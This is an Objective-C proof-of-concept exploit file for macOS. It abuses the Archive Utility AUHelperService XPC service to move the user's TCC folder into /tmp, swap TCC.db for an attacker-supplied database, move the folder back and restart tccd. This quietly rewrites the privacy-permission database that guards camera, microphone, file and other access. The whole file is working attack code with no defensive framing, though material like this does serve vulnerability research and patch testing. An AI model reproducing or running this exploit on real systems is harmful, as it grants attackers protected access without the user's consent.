/
exploit.m
69 lines (59 loc) · 2.84 KB
/
exploit.m
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
//
// main.m
// exploit_AUHelperService
//
// Created by mickey on 2023/6/6.
//
#import <Foundation/Foundation.h>
@interface NSSecurityScopedURLWrapper : NSObject <NSSecureCoding> {
}
-(id)initWithURL:(NSURL *)url;
-(NSURL *)url;
@end
@protocol AUHelperServiceProtocol
-(void) moveWithUniquingFrom:(NSURL *)from into:(NSURL *)into baseName:(NSString *)baseName sourceWrapper:(NSSecurityScopedURLWrapper *)wrapper withReply:(void (^)(NSSecurityScopedURLWrapper *))reply;
@end
void exploit_AUHelperService(const char *payload) {
void xpc_add_bundle(char *, int);
xpc_add_bundle("/System/Library/CoreServices/Applications/Archive Utility.app/Contents/XPCServices/AUHelperService.xpc", 2);
NSXPCConnection * conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.archiveutility.auhelperservice"];
conn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(AUHelperServiceProtocol)];
[conn setInterruptionHandler:^{
NSLog(@"connection interrupted!");
}];
[conn setInvalidationHandler:^{
NSLog(@"connection invalidated!");
}];
[conn resume];
__block id proxy = [conn remoteObjectProxy];
__block const char *payload_db = payload;
NSURL *targetURL = [NSURL fileURLWithPath:[NSHomeDirectory() stringByAppendingPathComponent:@"Library/Application Support/com.apple.TCC"]];
__block NSURL *targetDirURL = [NSURL fileURLWithPath:[NSHomeDirectory() stringByAppendingPathComponent:@"Library/Application Support"]];
__block NSURL *tmpURL = [NSURL fileURLWithPath:@"/tmp/com.apple.TCC"];
NSURL *tmpDirURL = [NSURL fileURLWithPath:@"/tmp"];
__block NSSecurityScopedURLWrapper *tmpDirWrapper = [[NSSecurityScopedURLWrapper alloc]initWithURL:tmpDirURL];
NSLog(@"moving from %@ to %@", targetURL, tmpDirURL);
[proxy moveWithUniquingFrom:targetURL into:tmpDirURL baseName:nil sourceWrapper:tmpDirWrapper withReply:^(NSSecurityScopedURLWrapper *resultWrapper) {
NSLog(@"result wrapper1:%@", resultWrapper);
NSLog(@"modifying the user's TCC.db");
unlink("/tmp/com.apple.TCC/TCC.db");
rename(payload_db, "/tmp/com.apple.TCC/TCC.db");
NSLog(@"moving from %@ to %@", tmpURL, targetDirURL);
[proxy moveWithUniquingFrom:tmpURL into:targetDirURL baseName:nil sourceWrapper:tmpDirWrapper withReply:^(NSSecurityScopedURLWrapper *resultWrapper) {
NSLog(@"result wrapper2:%@", resultWrapper);
NSLog(@"restarting the user's tccd process...");
system("launchctl stop com.apple.tccd");
system("launchctl start com.apple.tccd");
NSLog(@"all done.");
}];
}];
getchar();
}
int main(int argc, const char * argv[]) {
if (argc != 2) {
NSLog(@"Usage: %s /path/to/payload_TCC.db", argv[0]);
return -1;
}
exploit_AUHelperService(argv[1]);
return 0;
}